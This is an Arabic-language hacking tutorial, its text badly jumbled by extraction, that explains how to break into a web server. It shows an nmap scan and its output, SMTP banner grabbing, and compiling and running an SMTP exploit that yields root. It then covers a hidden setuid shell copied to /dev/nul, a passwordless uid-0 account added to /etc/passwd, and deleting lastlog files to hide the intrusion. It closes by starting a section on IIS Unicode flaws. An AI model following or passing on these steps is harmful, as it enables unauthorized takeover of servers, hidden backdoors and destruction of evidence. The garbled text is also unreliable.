www.netcraft.com‬لمعرف ‪ IP‬ونظام التشغیل وبعض المعلومات الخرى‪  ‬‬ ‫نجد التي‪                                                             ‬‬ ‫‪ -1‬نظام التشغیل ‪                                           Linux:‬‬ ‫‪                                                  2­ 160.8.8.1 : IP‬‬ ‫‪ -3‬سیرفر ‪                                                Apache :‬‬ ‫طیب نعمل ايه‪                                                        ‬‬


nmap ‫ نقوم بعمل سكان بــ‬: ‫اول‬                                                     nmap ‫كیفیة تنزيل‬                                               1­ tar zxvf nmap.tar.gz                                                           2­ cd nmap                                 3­ make install&&make&&configure                               972                            man nmap ‫اذا اردت معلومات عمن البرنامج اكتب‬                                                    scan ‫الن سنقوم بعمل‬                                             Nmap –sT –O –vv 160.8.8.1                                                   ‫ستظھر معلومات مشابھة‬                     Starting nmap V. 3.00 ( www.insecure.org/nmap/ )      Host localhost.localdomain (160.8.8.1) appears to be up ... good.     Initiating Connect() Scan against localhost.localdomain (160.8.8.1)                                                 Adding open port 23/tcp                                              Adding open port 6000/tcp                                                 Adding open port 22/tcp                                              Adding open port 1027/tcp                                                Adding open port 111/tcp                  The Connect() Scan took 1 second to scan 1601 ports.     For OSScan assuming that port 22 is open and port 1 is closed and                                                     neither are firewalled                  Interesting ports on localhost.localdomain (127.0.0.1):    (The 1596 ports scanned but not shown below are in state: closed)                                               Port      State      Service                                                  22/tcp    open         ssh                                               23/tcp     open        telnet                                             111/tcp open            sunrpc                                             25/tcp     open           smtp                                                6000/tcp open           X11             Remote operating system guess: Linux Kernel 2.4.0 ­ 2.5.20                                                           OS Fingerprint:            TSeq(Class=RI%gcd=1%SI=26D8DB%IPID=Z%TS=100HZ) T1(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW                                                                           )                                                              T2(Resp=N)                                    280 T3(Resp=Y%DF=Y%W=7FFF%ACK=S++%Flags=AS%Ops=MNNTNW                                                                              )                   T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)               T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)                   T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)               T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=) PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RI                                   PCK=E%UCK=E%ULEN=134%DAT=E)                     Uptime 0.007 days (since Sat Oct 5 01:12:31 2002)             TCP Sequence Prediction: Class=random positive increments                                           Difficulty=2545883 (Good luck!)      TCP ISN Seq. Numbers: CF9FF245 CF78E942 CFD91AAE D0406C91                                                       D0535F65 D05E00C1                                       IPID Sequence Generation: All zeros


‫‪ Nmap run completed ­­ 1 IP address (1 host up) scanned in 5 seconds‬‬ ‫شرح ماھو مكتوب‪                                                          :‬‬ ‫اول المر‪                                                                    : ‬‬ ‫‪ -sT‬يحدد‪ TCP ‬كوسیلة للفحص وھي السھل والكثر انتشارا بیت‪          ‬‬ ‫المخترقین لنھا ل تحتاج صلحیات‪                                            ‬‬ ‫‪ -O‬لتحديد نظان التشغیل‪                                                   ‬‬ ‫‪ -vv‬لعرض معلومات عن العملیات التي يقوم بھ ا البرنامج وتكتب مرتین لزيادة‪ ‬‬ ‫كثافة المعلومات‪                                                             ‬‬ ‫ثانیا مخرجات البرنامج‪                                                      : ‬‬ ‫يخبرنا البرنامج بوجود بورتات مفتوحة‪                                         ‬‬ ‫ولكن مانريده ھو‪ smtp ‬ورقم البورت‪                                      25 ‬‬ ‫الن سنقوم بالتصال بالموقع عن طريق‪                                 smtp ‬‬ ‫سنقوم بكتابة‪                                                                ‬‬ ‫‪                                     281‬‬ ‫‪                                                      telnet 160.8.8.1 25‬‬ ‫ستظھر معلومات مشابھة للتي‪                                          ‬‬ ‫‪                                                 Connected to 160.8.8.1‬‬ ‫‪                                                     Escape character is‬‬ ‫‪160.8.8.1 ESMTP send mail 9.10.0/9.6.3:linux 24 jun 2005 04:09:18 ­0‬‬ ‫‪                                                                 (EDT) 40‬‬ ‫‪                                                                       quit‬‬ ‫‪                                          160.8.8.1 closing connecting‬‬ ‫‪                                      connentin closed by foreigen host‬‬ ‫تفسیر المكتوب‪                                                           :‬‬ ‫ان‪ Smtp ‬اصدارة‪                                         9.10.0/9.6.3 ‬‬ ‫ماذا افعل الن‪                                                              ‬‬ ‫البحث عن اكسبلويت عن ھذه الصدارة‪                                   ‬‬ ‫اول الكسبلةويت ‪ :‬ھو برنامج مكتوب بلغة‪ c ‬او‪C++ ‬او‪                perl ‬‬ ‫كیفیة الحصول على اكسبلويت‪ :‬عن طريق موقع‪         securityfocus.com ‬‬ ‫او‪                                                        securiteam.com‬‬ ‫كل ماعلیك ھ و كتابة الثغرة المراد الدخول منھا ونظام التشغیل‪               ‬‬ ‫‪                                                                        Ok‬‬ ‫طلعلنا واحد ولیك‪                                                Smtp.c ‬‬ ‫دلوقتي نريد رفع الكسبلوبت للموقع للحصول على صلحیات روت‪            ‬‬ ‫عن طريق المر‪                                                            ‬‬ ‫‪                                 root@IcEr:~/# smtp ­t ­s 0 196.1.2.3‬‬ ‫ھتطلعلك حاجات زي دي‪                                                  ‬‬ ‫‪rpm RedHat 6.2 (?) with smtp from :<shellcode>/ ftp160.8.8.1Target:‬‬ ‫‪    Return Address: 0x08075844, AddrRetAddr: 0xbfffb028, Shellcode:‬‬ ‫‪                                                                       152‬‬ ‫‪                                                     ..loggin into system‬‬ ‫‪                                                                 USER ftp‬‬ ‫‪  .Guest login ok, send your complete e­mail address as password 331‬‬ ‫‪                                  282‬‬ ‫‪                                                       <shellcode> PASS‬‬ ‫‪      Next time please use your e­mail address as your password­230‬‬ ‫‪                                  for example: mega@egypt.com ­230‬‬ ‫‪                         .Guest login ok, access restrictions apply 230‬‬ ‫‪                      STEP 2 : Skipping, magic number already exists:‬‬ ‫‪                                             [[87,01:03,02:01,01:02,04‬‬


‫‪STEP 3 : Checking if we can reach our return address by format string‬‬ ‫‪   STEP 4 : Ptr address test: 0xbfffb028 (if it is not 0xbfffb028 ^C me‬‬ ‫‪                                                                     (now‬‬ ‫‪              .STEP 5 : Sending code.. this will take about 10 seconds‬‬ ‫‪                                                   Press ^\ to leave shell‬‬ ‫‪  Linux lame_box.za.net 2.2.14­5.0 #1 Tue Mar 7 21:07:39 EST 2000‬‬ ‫‪                                                           i686 unknown‬‬ ‫‪                 (uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp‬‬ ‫‪                                                    !Bang! You have root‬‬ ‫طیب كیفیة تشغیل الملف‪                                                :‬‬ ‫عن طريق عمل كمبايل للملف بالمر‪                                      ‬‬ ‫‪                                                      gcc smtp.c –o smtp‬‬ ‫‪                                                                   ./smtp‬‬ ‫طبعا لكل اكسبلويت ممكن يختلف عن اخر في عمل كومبايل‪               ‬‬ ‫كیفیة معرفة امر الكومبايل‪                                                ‬‬ ‫بالمر‪                                                              ./smtp ‬‬ ‫ستظھر كافة المعلومات التي ستاحتاجھا لرفع الملف وعمل كومبايل له‪      ‬‬ ‫دلوقتي عايزيت نعرف وضعنا على السیرفر‪                                 ‬‬ ‫عن طريق المر‪                                                 whoami $ ‬‬ ‫‪                                                                      Root‬‬ ‫وضعنا طلع رووت يعني مدير النظام وممكن نتحكم في السیبرفبر زي مااحنا‪  ‬‬ ‫عاوزيت وممكن تمسح الصفحة الساسیة‪                                 ‬‬ ‫‪                                  283‬‬ ‫ولكن ممكن لو عملت ‪ exit‬وندخل تاني ھ نحتاج نعمل الخطوات اللى فاتت‬ ‫بس فیه طريقة تانیه تديني شیل اكاونت على السیرفیر ده‪               ‬‬ ‫عن طريق اضافة ‪ User‬وعمل له صلحیات ‪                         root‬‬ ‫اول نسخ ملف ‪                                                 bin/sh‬‬ ‫بكتابة‪                                                                 ‬‬ ‫‪                                                 Cp /bin/sh /dev/nul‬‬ ‫لن يشعر الدمین بنسخ الملف لوجود ملفات بھذا السم‪                  ‬‬ ‫بعد كده نكتب‪                                                         ‬‬ ‫‪                                                               Cd /dev‬‬ ‫‪                                                      Chown root nul‬‬ ‫ونعطیله صلحیات ‪ suid‬وھي ‪                                    5774‬‬ ‫عن طريق المر‪                                                        ‬‬ ‫‪                                                    Chmod 4775 nul‬‬ ‫كیفیة اضافة ‪                                                   user :‬‬ ‫استعمل محرر النصوص ‪                                            vi‬‬ ‫‪                                                       Vi /etc/passwd‬‬ ‫دلوقتي دخلنا الى ملف باسور النظام والملف بیكون بالشكل ده‪           ‬‬ ‫‪                                 User:password:uid:gid:startdir:shell‬‬ ‫في حالة ‪super user‬يكون ‪ uid‬و ‪                             0 = gid‬‬ ‫ھنضیف السطر ده‪                                                    ‬‬ ‫‪                                           Mega::0:0:mega:/:bin/sh‬‬ ‫طبعا انت كده روووووووووووووووووووت‪                                   ‬‬ ‫الھ م في الموضوع ازالة اثار دخولك للسیرفر عن طريق مسح ھذه الملفات‬ ‫‪                                                      /Var/log/lastlog‬‬ ‫‪                                                    /Usr/adm/lastlog‬‬ ‫‪                                                    /Var/adm/lastlog‬‬ ‫ومحھا عن طريق المر ‪                                            lled‬‬


‫ لرفع الكسبلويت او اي اداة‬ftp ‫ لمن يستخدمون‬wted ‫او بالمر‬                               482     ‫طبعا دي اساسیات مش اكتر‬ 582                    (‫اختراق المواقع (الجزء الثاني‬                                                      Mega Egypt:‫للكاتب‬ ‫ التي تعمل تحت انظمة‬IIS ‫الن ساتطرق الى شرح كیفیة اختراق سیرفرات‬                                  Unicode ‫ وھي ثغرات الیونیكود‬Windows                                                 ‫وسوف نتحدث عنھا قلیل‬  ‫ وھذه الثغرة‬1002 ‫ مايو سنة‬51 ‫ في‬NSFOCUS ‫اكتشفت الیونیكود بواسطة‬ Windows ‫ وتعمل تحت انظمة‬IIS 4.0 & IIS 5.0 ‫تكون موجوده في سیرفرات‬    ‫ھذه الثغرة تمكن ا